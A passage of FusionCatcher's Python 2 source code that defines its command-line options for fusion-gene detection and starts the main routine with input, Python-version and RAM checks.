'gtex', 'metazoa', 'rt_circ_rna', 'similar_reads', 'similar_symbols', 'short_distance', 'yrna', '7skrna', 'rrna', 'trna', 'mt', 'lncrna', 'mirna', 'mitelman', 'oncokb', 'pseudogene', 'snorna', 'snrna', 'pair_pseudo_genes', 'prostate_cancer', 'rp', 'rp11', 'ensembl_fully_overlapping', 'ensembl_partially_overlapping', 'ensembl_same_strand_overlapping', 'ribosomal', 'cta', 'ctb', 'ctc', 'ctd', 'conjoing', 'healthy', 'ucsc_fully_overlapping', 'ucsc_partially_overlapping', 'ucsc_same_strand_overlapping', 'refseq_fully_overlapping', 'refseq_partially_overlapping', 'refseq_same_strand_overlapping', 'gencode_fully_overlapping', 'gencode_partially_overlapping', 'gencode_same_strand_overlapping', 'dist10kbp', 'dist100kbp', 'fragments', 'banned', 'hla', 'non_tumor_cells', 'non_cancer_tissues', 'removed', 'tcga', 'tcga2', 'tcga-normal', 'tcga-cancer']) parser.add_option("--filter-fusion","-b", action = "store", type = "string", dest = "biotypes", default = ','.join(sorted(mydefault)), help = optparse.SUPPRESS_HELP) # help = "Candidate gene fusions to be skipped from further "+ # "analysis in case that one of "+ # "partner gene or both genes (which form a fusion) "+ # "are specified here. "+ # "All possible values are: ["+', '.join(sorted(all_choices))+"]. "+ # "'short_distance' is used for labeling the "+ # "candidate fusion genes which do meet the criteria "+ # "specified with '--min-dist-fusion'. "+ # "Several can be chosen but in this case they " + # "should comma separated. "+ # "Default is '%default'.") parser.add_option("--filter-fusion-add","-B", action = "store", type = "string", dest = "biotypes_more", help = optparse.SUPPRESS_HELP) # help = "Any label of fusion genes specified here will be "+ # "appended to the list given to '--filter-fusion'. "+ # "This is just an easy way to add more to '--filter-fusion'. "+ # "For more read the description of '--filter-fusion'. "+ # "Default is '%default'.") parser.add_option("--dist-fusion","-D", action = "store", type = "int", dest = "min_dist", default = 200000, help = optparse.SUPPRESS_HELP) # "The candidate fusion genes where the distance "+ # "between the genes is below this threshold will be marked "+ # "using the label 'custom_distance' "+ # "Default is '%default'.") parser.add_option("--all-reads-fusion","-A", action = "store_true", dest = "all_reads_junction", default = False, help = optparse.SUPPRESS_HELP) # "If it is specified then all reads (reads which form "+ # "a pair and single reads which do not have a mate "+ # "read because their mate has been removed due to "+ # "different reasons, like for example low quality), "+ # "will be used for finding the fusion point, which "+ # "is the exon-exon junction. If not specified then only "+ # "reads which form a pair will be used for "+ # "finding the exon-exon junction (one read maps on one "+ # "of the transcripts of the gene involved in the fusion "+ # "and its mate will map on the exon-exon junction). "+ # "Default is '%default'." parser.add_option("--homolog-fusion","-H", action = "store", type = "float", dest = "homolog", default = float(1)/float(8*(10**4)),#float(1)/float(2*(10**5)), # float(1)/float(8*(10**4)),# float(1)/float(5*(10**4)), help = optparse.SUPPRESS_HELP) # "The minimum number of reads (as percentage [0..1]) "+ # "which map simultaneously "+ # "onto two genes in order to be considered homologous. "+ # "If set to 0 then no homology analysis is done. "+ # "This information is used for filtering out candidate "+ # "fusion genes which are homologous. "+ # "Default is '%default'." parser.add_option("--filter-str", action = "store", type = "float", dest = "filter_str", default = 0, #1.4, # 2.1 help = optparse.SUPPRESS_HELP) # help = "If specified to 0 then it skips filtering out the reads "+ # "which contain STR (short tandem repeats). "+ # "Default is '%default'." parser.add_option("--visualization-psl", action = "store_true", dest = "psl_visualization", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will use the BLAT "+ # "aligner for aligning the reads which support the "+ # "newly found candidate fusion genes. Please, note "+ # "that BLAT license does not allow BLAT to be used for "+ # "commercial activities. Fore more information "+ # "regarding BLAT please see its license: "+ # "<http://users.soe.ucsc.edu/~kent/src/>. Also please, note "+ # "that this option is not actively supported anymore and "+ # "in the future will be deprecated. If one still wants "+ # "to use it, then one should run this 'faToTwoBit genome.fa genome.2bit -noMask') "+ # "in 'fusioncatcher/data/current/'. Instead it is recommended to use "+ # "'--visualization-sam'. This will be deprecated in the future. "+ # "Default is '%default'.") parser.add_option("--visualization-sam", action = "store_true", dest = "sam_visualization", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will use the BOWTIE2 "+ # "aligner for aligning the reads which support the "+ # "newly found candidate fusion genes. "+ # "Default is '%default'.") parser.add_option("--assembly","-M", action = "store_true", dest = "assembly", default = False, help = optparse.SUPPRESS_HELP) # help = "If used then the reads found to support the newly "+ # "found candidate fusion genes are assembled using "+ # "VELVET <http://www.ebi.ac.uk/~zerbino/velvet/>. "+ # "This will be deprecated in the future. " + # "Default is '%default'.") parser.add_option("--sonication", action = "store", type = "int", dest = "sonication", default = 130, help = optparse.SUPPRESS_HELP) # help = "In case that the input reads are longer than the threshold set here "+ # "then they will be broken up bioinformatically in smaller reads. "+ # "If this is set to 0 then no break up will be done. "+ # "Default is '%default'.") parser.add_option("--bridges", action = "store", type = "int", dest = "bridges", default = 0, help = optparse.SUPPRESS_HELP) # help = "Number of encompasses paired-reads to be generated for each input long read. "+ # "If it is set to 0 then the number will chosen automatically based on "+ # "the length of input reads, i.e. ceil(length_read/160). " + # "Default is '%default'." parser.add_option("--skip-deduplication", action = "store_true", dest = "skip_deduplication", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out "+ # "the reads which are duplicates to each other. "+ # "Default is '%default'." ) # parser.add_option("--skip-super-fast-prefilter", # action = "store_true", # dest = "skip_superfast", # default = False, # help = optparse.SUPPRESS_HELP ## help = "If specified then it skips filtering out "+ ## "the reads which mapping on same transcript. "+ ## "Default is '%default'." # ) parser.add_option("--prefilter", action = "store", type = "string", dest = "prefilter", default = "1", # help = optparse.SUPPRESS_HELP) # help = " 0 - no pre-filtering "+ # " 1 - pre-filtering done in the very beginning "+ # " 2 - pre-filtering done later than 1 "+ # " 3 - pre-filtering done later than 2 "+ # "Default is '%default'." # ) # parser.add_option("--skip-later-filter", # action = "store_true", # dest = "skip_later_filter", # default = False, # help = optparse.SUPPRESS_HELP ## help = "If specified then it skips filtering out "+ ## "the reads which mapping on same transcript. "+ ## "Default is '%default'." # ) # parser.add_option("--fast-prefilter", # action = "store_true", # dest = "fast", # default = False, # help = optparse.SUPPRESS_HELP ## help = "If specified then it skips filtering out "+ ## "the reads which mapping on same transcript BUT "+ ## "before the FASTQ are trimmed and merged. "+ ## "Default is '%default'." # ) parser.add_option("--skip-filter-mt", action = "store_true", dest = "skip_mitochondrion_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads "+ # "which map on the mitochondrion. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-vir", action = "store_true", dest = "skip_viruses_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads "+ # "which map on known genomes of viruses. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-b", action = "store_true", dest = "skip_b_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads with "+ # "B quality scores (i.e. low quality) which are a special "+ # "indicator in "+ # "Fastq Illumina files. Default is '%default'." ) parser.add_option("--filter-ambiguous","-Y", action = "store_true", dest = "ambiguous_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it filters out the reads which "+ # "maps ambiguously (i.e. same read map simultaneously on two "+ # "locuses on genome/transcriptome within 0-3 mismatches. " # "Default is '%default'." ) parser.add_option("--skip-filter-genome","-G", action = "store_true", dest = "skip_genome_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads which "+ # "maps multiple times on genome. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-unmapped-pairs", action = "store_true", dest = "skip_unmapped_pairs_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the pair of reads which "+ # "are unmapped. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-genome-transcriptome", action = "store_true", dest = "skip_genome_transcriptome_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads which "+ # "map better on genome than on transcriptome. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-adapter", action = "store_true", dest = "skip_adapter_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads which "+ # "contains the adapters. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-psl", action = "store_true", dest = "skip_prefiltering_psl", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will not prefilter "+ # "the short reads which will be used for doing BLAT/STAR/BOWTIE2 alignment. "+ # "By default, the short reads are prefiltered before "+ # "being aligned using BLAT/STAR/BOWTIE2 in order to speed up the BLAT/STAR/BOWTIE2 "+ # "alignment which is time and computationally demanding. "+ # "The disadvantage of doing prefiltering is that the sensitivity "+ # "of BLAT/STAR/BOWTIE2 alignment is somewhat lowered. "+ # "Default is '%default'.") parser.add_option("--skip-interleave", action = "store_true", dest = "skip_interleave_processing", default = False, help = optparse.SUPPRESS_HELP) # help = "If specified then it skips interleaving the short reads "+ # "from the input FASTQ files. The program tries automatically "+ # "to pair the forward and reverse short reads based on file "+ # "names. In case that the pair is done wronlgy then this "+ # "argument should be used to remedy the problem. "+ # "Default is '%default'.") parser.add_option("--skip-known-fusions", action = "store_true", dest = "skip_known_fusions", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will not use its own database "+ # "and COSMIC database of already known fusion genes! "+ # "Here skipping means that the known fusion genes will "+ # "treated as any other candidate fusion genes "+ # "and if there is enough evidence will be shown in the "+ # "final list of found fusion genes. By default, the known "+ # "fusion genes are treated preferentially and are pushed "+ # "directly to the very final step of finding the junction "+ # "point. " + # "Default is '%default'.") parser.add_option("--skip-adjacent", action = "store_true", dest = "skip_adjacent", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will not seach for "+ # "candidate fusion genes where the genes are adjacent! "+ # "By default the candidate fusion genes which have "+ # "genes that are adjacent are analysed also but in many cases "+ # "they are just annotation errors in the Ensembl database "+ # "and maybe they are not real fusion genes. "+ # "Default is '%default'.") parser.add_option("--skip-banned-fusions", action = "store_true", dest = "skip_banned_fusions", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the list of known banned fusion "+ # "genes (which are found in healthy samples) is not used. "+ # "Default is '%default'.") parser.add_option("--keep-viruses-alignments","-V", action = "store_true", dest = "keep_viruses", default = False, help = "If it is set then the SAM alignments files of reads mapping on "+ "viruses genomes are saved in the output directory "+ "for later inspection by the user. "+ "Default is '%default'.") parser.add_option("--keep-unmapped-reads","-U", action = "store_true", dest = "keep_unmapped_reads", default = False, help = "If it is set then the FASTQ files, containing "+ "the unmapped reads (i.e. reads which do not map "+ "on genome and transcriptome), are saved in the output directory "+ "for later inspection by the user. "+ "Default is '%default'.") parser.add_option("--skip-compress-ids", action = "store_true", dest = "skip_compress_ids", default = False, help = optparse.SUPPRESS_HELP # help = "If it is set then the reads ids will not be compressed "+ # "(i.d. renamed) using lossy compression and "+ # "the original reads ids will be kept thru the whole "+ # "run of FusionCatcher. Be default the reads ids will be "+ # "compressed using lossy compression. "+ # "Default is '%default'." ) parser.add_option("--compress-transcripts", action = "store_true", dest = "compress_transcripts", default = False, help = optparse.SUPPRESS_HELP # help = "It compresses the fusions transcripts sequences in the final report by "+ # "outputing the transcripts ids instead of the sequences "+ # "of the fusion transcripts "+ # "Default is '%default'." ) parser.add_option("--skip-automatic-scaling", action = "store_true", dest = "skip_automatic_scaling", default = False, help = optparse.SUPPRESS_HELP # help = "If it is set then the thresholds for anchor length, "+ # "spanning reads, and spanning pairs will not be adjusted "+ # "automatically according to the input reads. "+ # "Default is '%default'." ) parser.add_option("--ff-tryhard", action = "store_true", dest = "ff_tryhard", default = False, help = optparse.SUPPRESS_HELP # help = "If it is specified then '--tryhard' will be used for 'bowtie' when '--ff' is used. "+ # "Default is '%default'." ) parser.add_option("--aligners", action = "store", type = "string", dest = "aligners", default = os.path.abspath(os.path.join(pipeline_path,"..","etc","configuration.cfg"))+',' + "blat,star", help = "The aligners to be used on Bowtie aligner. "+ "By default always BOWTIE aligner is used and it "+ "cannot be disabled. The choices are: "+ "['blat','star','bowtie2']. Any combination of these is "+ "accepted if the aligners' names are comma separated. "+ "For example, if one wants to used all four aligners "+ "then 'blat,star,bowtie2' should be given. "+ "The command line options '--skip-blat', '--skip-star', "+ "and '--skip-bowtie2' have priority over this option. "+ "If the first element in the list is the configuration file "+ "(that is '.cfg' file) of FusionCatcher "+ "then the aligners specified in the list of "+ "aligners specified in the configuration file will "+ "be used (and the rest of aligner specified here "+ "will be ignored). "+ "In case that the configuration file is not found "+ "then the following aligners from the list will be used. " "Default is '%default'.") parser.add_option("--skip-blat", action = "store_true", dest = "skip_blat", default = False, help = "If it is set then the pipeline will NOT use the BLAT "+ "aligner and all options and methods which make use of "+ "BLAT will be disabled. "+ "BLAT aligner is used by default. Please, note "+ "that BLAT license does not allow BLAT to be used for "+ "commercial activities. Fore more information "+ "regarding BLAT please see its license: "+ "<http://users.soe.ucsc.edu/~kent/src/>. "+ "Default is '%default'.") parser.add_option("--skip-star", action = "store_true", dest = "skip_star", default = False, help = "If it is set then the pipeline will NOT use the STAR "+ "aligner and all options and methods which make use of "+ "STAR will be disabled. "+ "STAR aligner is used by default. " + "Default is '%default'.") parser.add_option("--skip-bowtie2", action = "store_true", dest = "skip_bowtie2", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will NOT use the BOWTIE2 "+ # "aligner and all options and methods which make use of "+ # "BOWTIE2 will be disabled. "+ # "BOWTIE2 aligner is used by default. " + # "Default is '%default'.") parser.add_option("--skip-spotlight", action = "store_true", dest = "skip_spotlight", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will NOT use the spotlight "+ # "method for finding fusion genes. "+ # "Default is '%default'.") # parser.add_option("--skip-bwa", # action = "store_true", # dest = "skip_bwa", # default = False, # help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will NOT use the BWA "+ # "aligner and all options and methods which make use of "+ # "BWA will be disabled. "+ # "BWA aligner is used by default. " + # "Default is '%default'.") parser.add_option("--skip-conversion-grch37", action = "store_true", dest = "skip_conversion_grch37", default = False, # help = optparse.SUPPRESS_HELP, help = "If it is set then the fusion coordinates for human "+ "genome version GRCh38 (which is default) will NOT be "+ "reported also using version GRCh37/hg19. " + "Default is '%default'.") parser.add_option("--limit-blat", action = "store", type = "int", dest = "limit_blat", default = 3 * (2**30), help = optparse.SUPPRESS_HELP) # help = "The maximum limit of the genome's size which BLAT aligner "+ # "is able to handle. If the genome is larger than this limit "+ # "then it will be split automatically in smaller pieces such that "+ # "the aligner can handle them without an error. "+ # "Default is '%default'.") parser.add_option("--limit-bowtie", action = "store", type = "int", dest = "limit_bowtie", default = 2**32 - 100000, # 15.2.2017 was 2**32 - 100000 help = optparse.SUPPRESS_HELP) # help = "The maximum limit of the genome's size which BOWTIE aligner "+ # "is able to handle. If the genome is larger than this limit "+ # "then it will be split automatically in smaller pieces such that "+ # "the aligner can handle them without an error. "+ # "Default is '%default'.") parser.add_option("--limit-bowtie2", action = "store", type = "int", dest = "limit_bowtie2", default = 30*(10**6), # 300*(10**6) help = optparse.SUPPRESS_HELP) # help = "The maximum limit of the genome's size which BOWTIE2 aligner "+ # "is able to handle. If the genome is larger than this limit "+ # "then it will be split automatically in smaller pieces such that "+ # "the aligner can handle them without an error. "+ # "Default is '%default'.") parser.add_option("--limit-star", action = "store", type = "int", dest = "limit_star", default = 500*(10**6),# original 17.2.2017 => 500*(10**6) ====>,#1,#30*(10**6), # 3 * (2**30) help = optparse.SUPPRESS_HELP) # help = "The maximum limit of the genome's size which STAR aligner "+ # "is able to handle. If the genome is larger than this limit "+ # "then it will be split automatically in smaller pieces such that "+ # "the aligner can handle them without an error. "+ # "Default is '%default'.") parser.add_option("--paranoid-sensitive", action = "store_true", dest = "paranoid_sensitive", default = False, help = optparse.SUPPRESS_HELP) # help = "This will increase the sensitivity of finding fusion genes "+ # "at maximum at the expense of very high rate of false positives. "+ # "It is not recommended to be used for finding novel fusion genes. "+ # "It may be used in cases when one searches for already known fusion "+ # "genes which were missed in previous runs with default sensitivity. "+ # "Default is '%default'.") parser.add_option("--label-title", action = "store", type = "string", dest = "label_title", help = optparse.SUPPRESS_HELP) # help = "The label title(s) which will be used to mark the "+ # "candidate fusion genes given as input to '--label-file'. "+ # "If several are given then they should be comma separated. "+ # "If '--label-title' is used then also '--label-file' should be specified.") parser.add_option("--label-file", action = "store", type = "string", dest = "label_file", help = optparse.SUPPRESS_HELP) # help = "File(s) containing pairs of Ensembl gene ids (separated by tab, "+ # "i.e. first two columns) "+ # "candidate fusion genes given as input to '--label-file'. "+ # "If several are given then they should be comma separated. "+ # "If '--label-file' is used then also '--label-title' should be specified.") parser.add_option("--label-threshold", action = "store", type = "string", dest = "label_threshold", help = optparse.SUPPRESS_HELP) # help = "The thresholds which might be given as an optional column 3 "+ # "in '--label-file'. All the pairs given in '--label-file' "+ # "which have the number of column number 3 strictly less than "+ # "this given threshold will be ignored/skipped. "+ # "If several are given then they should be comma separated.") parser.add_option("--skip-rescue", action = "store_true", dest = "skip_star_bowtie", default = False, help = optparse.SUPPRESS_HELP) # help = "By default it is tried to rescue "+ # "STAR's partially mapped reads (which includes also gap alignment "+ # "for IG@ fusions) by running "+ # "again BOWTIE aligner and stich together the the partialy mapped reads. " + # "If this is set then the pipeline will NOT use the BOWTIE "+ # "aligner within the the usage of STAR aligner and no rescuing is done. " + # "Default is '%default'.") parser.add_option("--rescue-wiggle-size", action = "store", type = "int", dest = "rescue_wiggle_size", default = 0, help = optparse.SUPPRESS_HELP) # help = "Some wiggle room is allowed in case of gap alignment of rescued reads. "+ # "Default is '%default'.") parser.add_option("--rescue-gap-size", action = "store", type = "int", dest = "rescue_gap_size", default = 0, help = optparse.SUPPRESS_HELP) # help = "Some very small wiggle room is allowed in case of rescuing the reads alignments. "+ # "Default is '%default'.") parser.add_option("--limitSjdbInsertNsj", action = "store", type = "int", dest = "limitSjdbInsertNsj", default = 2000000, help = "This option is passed diretly to STAR aligner "+ "For more info see STAR aligner regarding this option. " "Default is '%default'.") parser.add_option("--limitOutSJcollapsed", action = "store", type = "int", dest = "limitOutSJcollapsed", default = 1000000, help = "This option is passed diretly to STAR aligner "+ "For more info see STAR aligner regarding this option. " "Default is '%default'.") parser.add_option("--ig-gap-size", action = "store", type = "int", dest = "length_gap", default = 21, # default 18? help = optparse.SUPPRESS_HELP) # help = "In case of IG@ fusions a gap in alignment of reads is allowed. "+ # "The maximum length of the gap is specified here. " # "Default is '%default'.") parser.add_option("--ig-gap-mismatches", action = "store", type = "int", dest = "mismatches_gap", default = 7, help = optparse.SUPPRESS_HELP) # help = "Maximum number of mismatches to be allowed for "+ # "mapping reads when also a gap is allowed. "+ # "Default is '%default'.") parser.add_option("--ig-gap-anchor", action = "store", type = "int", dest = "length_anchor_gap", default = 17, # default 14; 17; 18? help = optparse.SUPPRESS_HELP) # help = "In case of gap alignments, it is the minimum length which a read should "+ # "overlap over (or anchor/overhang for) "+ # "fusion junction of a candidate fusion gene in order to be considered for " + # "further analysis. Minimum accepted value is 10 and it should not exceed half "+ # "of the length of the longest read from the input data. "+ # "Default is '%default'.") parser.add_option("--ig-gap-anchor-max", action = "store", type = "int", dest = "length_anchor_gap_max", default = 100, # default 100 help = optparse.SUPPRESS_HELP) # help = "In case of gap alignments, it is the maximum length which a read should "+ # "overlap over (or anchor/overhang for) "+ # "fusion junction of a candidate fusion gene in order to be considered for " + # "further analysis. Minimum accepted value is 10 and it should not exceed half "+ # "of the length of the longest read from the input data. "+ # "Default is '%default'.") parser.add_option("--ig-gap-wiggle-size", action = "store", type = "int", dest = "gap_wiggle_size", default = 2, help = optparse.SUPPRESS_HELP) # help = "Some wiggle room is allowed in case of gap alignment of reads. "+ # "Default is '%default'.") parser.add_option("--ig-gap-skip-extension", action = "store_true", dest = "skip_extension", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will NOT use the extended reads "+ # "wherever is possible for gap alignment. "+ # "Default is '%default'.") parser.add_option("--ig-bowtie", action = "store_true", dest = "skip_ig_star", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will use BOWTIE instead of STAR "+ # "for gap alignment. "+ # "Default is '%default'.") parser.add_option("--focus", action = "store", type = "string", dest = "focus_fusions", help = optparse.SUPPRESS_HELP) # help = "It contains a tab separated file text containd two columns "+ # "with Ensembl gene ids for candidate fusion genes which will "+ # "be forced to pass the preliminary filtering. This lines should "+ # "be sorted and also the columns should be sorted.") parser.add_option("--reads-preliminary-fusions", action = "store_true", dest = "reads_preliminary_fusions", default = False, help = optparse.SUPPRESS_HELP) # help = "The sequences of all reads which support the preliminary candidate fusion genes "+ # "are extracted. "+ # "Default is '%default'.") parser.add_option("--long", action = "store_true", dest = "long_report", default = False, help = optparse.SUPPRESS_HELP) # help = "A slightly longer report for fusion genes will be generated (i.e. fusions genes will be given per each aligner used). "+ # "Default value is '%default'.") parser.add_option("--skip-bbmerge", action = "store_true", dest = "skip_bbmerge", default = False, help = optparse.SUPPRESS_HELP) # help = "Use BBMERGE.SH instead of original script for merging the paired-end reads. "+ # "Default value is '%default'.") parser.add_option("--skip-bbmerge-auto", action = "store_true", dest = "skip_bbmerge_auto", default = False, help = optparse.SUPPRESS_HELP) # help = "Use BBMERGE-AUTO.SH instead of BBMERGE.SH for merging the paired-end reads. "+ # "Default value is '%default'.") parser.add_option("--extract-buffer-size", action = "store", type = "int", dest = "extract_buffer_size", default = 1*(10**9), # default = 2*(10**9) help = optparse.SUPPRESS_HELP) # help = "The size of memory buffer used by Python script (for extracting reads from a FASTQ file based on a list of reads ids). "+ # "This depends more on the amount of memory which Python environment is able to handle and less than the free actual free RAM memory on the computer where this is run. "+ # "It might be that the default value is too high and needs to be lowered, e.g. '500000000' "+ # "be required to be lowered. This is meant to be used together with '--split-seqtk-subseq 0'. " + # "Default is '%default'.") parser.add_option("--split-seqtk-subseq", action = "store", type = "int", dest = "split_seqtk_subseq", default = 1, help = optparse.SUPPRESS_HELP) # help = "The input file (i.e. file containing read ids) of 'SEQTK SUBSEQ' will "+ # "be splitted in a number of parts specified here. If it is 1 then no spliting is done. "+ # "If it is set to 0 then 'SEQTK SUBSEQ' will not be used and instead an alternative Python script is used. "+ # "Setting this to 0 or 2 or larger values is meant to be used in cases when "+ # "'SEQTK SUBSEQ' fails due to not enough memory. "+ # "Default is '%default'.") parser.add_option("--sort-buffer-size", action = "store", dest = "sort_buffer_size", default = "80%", help = "It specifies the buffer size for command SORT. "+ "Default is '%default' if less than 32GB RAM is "+ "installed on computer else is set to 26GB.") parser.add_option("--start", action = "store", type = "int", dest = "start_step", default = 0, help = "It re-starts executing the workflow/pipeline from the given "+ "step number. This can be used when the pipeline "+ "has crashed/stopped and one wants to re-run it from "+ "from the step where it stopped without re-running " + "from the beginning the entire pipeline. "+ "0 is for restarting automatically and 1 is the first step. "+ "Default is '%default'.") choices = ('no','crc32','md5','adler32','sha512','sha256') parser.add_option("--hash", action = "store", type = "choice", choices = choices, dest = "hash", default = "no", help = optparse.SUPPRESS_HELP) # help = "Hash to be used for computing checksum. The choices "+ # "are ['"+"','".join(choices)+"']. "+ # "If it is set up to 'no' then no checksum is used and "+ # "the entire pipeline is executed as a normal shell "+ # "script. For more information see 'hash_library' in "+ # "'workflow.py'. "+ # "Default is '%default'.") parser.add_option("--Xmx", action = "store", type = "string", dest = "xmx", default = "18g", help = "The amount of memory to be used by Java tools. " + "This will be passed to Javas '-Xmx' so for more info see '-Xmx' in java." + "Default is '%default'.") parser.add_option("--reads", action = "store", type = "int", dest = "reads", default = 0, help = "Only the first reads from the input FASTQ files will be used. "+ "Default is '%default'.") parser.add_option("--keep", action = "store_true", dest = "keep_temporary_files", default = False, help = optparse.SUPPRESS_HELP) # help = "Preserve intermediate files produced during the run. "+ # "By default, they are deleted upon exit. "+ # "Default value is '%default'.") parser.add_option("--keep-preliminary", action = "store_true", dest = "keep_preliminary", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then preliminary candidate fusion genes are kept (i.e. they are not deleted). "+ # "Default is '%default'.") parser.add_option("--checksums", action = "store", type = "string", dest = "checksums_filename", default = 'checksums.txt', help = optparse.SUPPRESS_HELP) # help = "The name of the checksums file. "+ # "Default value is '%default'. ") parser.add_option("--bowtie-chunkmbs", action = "store", type = "int", dest = "chunkmbs", default = 128, # 128 help = optparse.SUPPRESS_HELP) # help = "The value to be passed to the '--chunkmbs' command line option of Bowtie aligner. "+ # "Default is '%default'.") parser.add_option("--mismatches","-m", action = "store", type = "int", dest = "mismatches", default = 2, help = optparse.SUPPRESS_HELP) # help = "Maximum number of mismatches to be allowed for "+ # "mapping reads using Bowtie aligner. "+ # "Minimum accepted value is zero and maximum is 3. "+ # "Default is '%default'.") parser.add_option("--mismatches-psl", action = "store", type = "int", dest = "mismatches_psl", default = 2, help = optparse.SUPPRESS_HELP) # help = "Maximum number of mismatches to be allowed for "+ # "mapping reads using BLAT/STAR/BOWTIE2 aligner. "+ # "Default is '%default'.") parser.add_option("--mismatches-ambiguous", action = "store", type = "int", dest = "ambiguous_mismatches", default = 2, help = optparse.SUPPRESS_HELP) # help = "Maximum number of mapping mismatches for which the " # "same reads are considered mapping ambiguously. "+ # "Default is '%default'.") parser.add_option("--mismatches-filtering", action = "store", type = "int", dest = "filter_mismatches", default = 2, help = optparse.SUPPRESS_HELP) # help = "Maximum number of mapping mismatches used for filtering the reads. "+ # "Default is '%default'.") parser.add_option("--top-pairs-fusion", action = "store", type = "int", dest = "spanning_pairs_count", default = 8000, help = optparse.SUPPRESS_HELP) # help = "If the '--pairs-fusion' selects more than N preliminary "+ # "candidate fusion genes then only the first N will be "+ # "considered for further analysis. N is set here. "+ # "Default is '%default'.") parser.add_option("--pairs-fusion","-s", action = "store", dest = "spanning_pairs", default = "3,3,3,3,3", help = optparse.SUPPRESS_HELP) # help = "The minimum number of (encompassing) paired-end reads which "+ # "support a candidate fusion gene and which will be "+ # "considered for further analysis. "+ # "It is given separated by commas for each of "+ # "the aligners: BOWTIE, BLAT, STAR, BOWTIE2, SPOTLIGHT (in this order). " + # "This should be used only for DEBUGGING purposes! This will be deprecated in the future! "+ # "Default is '%default'.") parser.add_option("--reads-fusion","-r", action = "store", dest = "spanning_reads", default = "2,2,2,2,2", help = optparse.SUPPRESS_HELP) # help = "The minimum number of reads which "+ # "support a candidate fusion gene that is the minimum "+ # "number of reads which overlap over the fusion "+ # "junction. It is given separated by commas for each of "+ # "the aligners: BOWTIE, BLAT, STAR, BOWTIE2, SPOTLIGHT (in this order). " + # "This should be used only for DEBUGGING purposes! This will be deprecated in the future! "+ # "Default is '%default'.") parser.add_option("--anchor-fusion","-a", action = "store", dest = "length_anchor", default = "17,17,17,17,40", # default 14; 17; 18? help = optparse.SUPPRESS_HELP) # help = "The minimum length which a read should overlap over (or anchor/overhang for) "+ # "fusion junction of a candidate fusion gene in order to be considered for " + # "further analysis. Minimum accepted value is 10 and it should not exceed half "+ # "of the length of the longest read from the input data. It is given separated "+ # "by commas for each of the aligners: BOWTIE, BLAT, STAR, BOWTIE2, SPOTLIGHT (in this order). " + # "This should be used only for DEBUGGING purposes! This will be deprecated in the future! "+ # "Default is '%default'.") parser.add_option("--anchor-fusion2","-W", action = "store", type = "int", dest = "length_anchor2", default = 47, # default 22? help = optparse.SUPPRESS_HELP) # help = "If the anchor/overhang which supports the fusion is longer (or equal) than "+ # "this value than the required number of reads supporting the fusion is 1. " + # "It basically overrides '--reads-fusion*' for anchors longer (or equal) than"+ # "the value specified here. It always should be larger than the value "+ # "specified by '--reads-fusion*'. "+ # "This should be used only for DEBUGGING purposes! This will be deprecated in the future! "+ # "Default is '%default'.") ################################################################################ # # MAIN # ################################################################################ #command line parsing (options, args) = parser.parse_args() # # validate options # if ( (not options.input_filename) or (not options.output_directory) ): parser.print_help() print "EXAMPLE:" print "========" print "" print "fusioncatcher -d /some/data/directory/ -i /some/input/directory/containing/fastq/files/ -o /some/output/directory/" print "" print "" print "where /some/data/directory/ contains data which was built previously by running:" print "" print "" print "fusioncatcher-build -g homo_sapiens -o /some/data/directory/" print "" print "or it has been downloaded (see: FusionCatcher's manual, section 'Downloading/building organism's data')." print "" print "NOTE:" print "'fusioncatcher-build' needs to be run only once (for each organism" print "or when the Ensembl database is updated) and 'fusioncatcher'" print "will reuse the '/some/data/directory/'." print "" print "" print >>sys.stderr, "ERROR: input/output directory is not specified!" print >>sys.stderr, "" sys.exit(1) print "Checking Python version..." pythonversion = sys.version_info if pythonversion >= (2,6) and pythonversion < (3,0) and struct.calcsize("P") * 8 >= 64: print " * Compatible Python version found!" else: print >>sys.stderr, " * ERROR: Found Python version: %s.%s !\n" % (pythonversion[0],pythonversion[1]) print >>sys.stderr, " The Python should be 64-bit and the version should be >=2.6.0 and < 3.0 !" sys.exit(1) print "Checking size of installed RAM memory ..." total_memory = 0 try: total_memory = int(float(os.popen("free -m").readlines()[1].split()[1])) except: pass if total_memory != 0: if total_memory < 23000: print >>sys.stderr, " * ERROR: %d MB of RAM memory found (minimum of 24 GB of RAM memory is needed)!" % (total_memory,) sys.exit(1) else: print " * %d MB of RAM memory found!" % (total_memory,) else: print >>sys.stderr, " * Warning: Not able to detect the size of installed RAM memory!" if options.trim_3end > 0 and options.trim_3end_5end_keep > 0: parser.error("ERROR: Arguments '--5keep'and '--3end' are mutually exclusive!") sys.exit(1) if options.tmp_directory == "tmp": options.tmp_directory = os.path.join(expand(options.output_directory),"tmp") if expand(options.input_filename) == expand(options.output_directory): parser.error("ERROR: Input and output paths should be different!") sys.exit(1) if expand(options.input_filename) == expand(options.tmp_directory): parser.error("ERROR: Input and temporary paths should be different!") 